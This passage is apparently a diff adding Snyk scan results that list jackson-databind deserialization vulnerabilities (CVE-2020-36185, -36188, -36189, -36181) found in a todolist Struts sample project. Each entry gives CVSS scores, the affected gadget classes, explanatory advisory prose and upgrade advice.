"assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.622591Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:39.244182Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.307628Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36185" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:36:40.536722Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:34:52Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.303463Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:01.307628Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056425", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + 
"baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:42.513059Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:00.658291Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.824076Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.DriverManagerConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36189" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:37:54.679882Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:37:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.089230Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.824076Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + 
"io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056426", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2996", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36188", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:42.488317Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.922274Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:03.468032Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.newrelic.agent.deps.ch.qos.logback.core.db.JNDIConnectionSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2996)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36188)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36188" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:39:28.531700Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:32Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:03.468032Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056427", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Poc" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "cvssSources": [ + { + "type": 
"primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.757298Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.854860Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.686589Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [Poc](https://github.com/Al1ex/CVE-2020-36179)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36181" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:41:09.172252Z", + "functions_new": [ + { + "version": [ + "[, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:38:31Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.686589Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1061931", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Yangkun (ICSL)" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.7)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7dbf51bf78d157098074a20bd9da39bd48c18e4a", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2854", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/releases/tag/jackson-databind-2.9.10.7", + "title": "GitHub Release" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1916633", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:15.847219Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:04.169362Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "SUSE", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:37.142422Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:15.847219Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:17.193594Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `javax.swing` gadget (specifically `javax.swing.JTextPane`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. 
Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
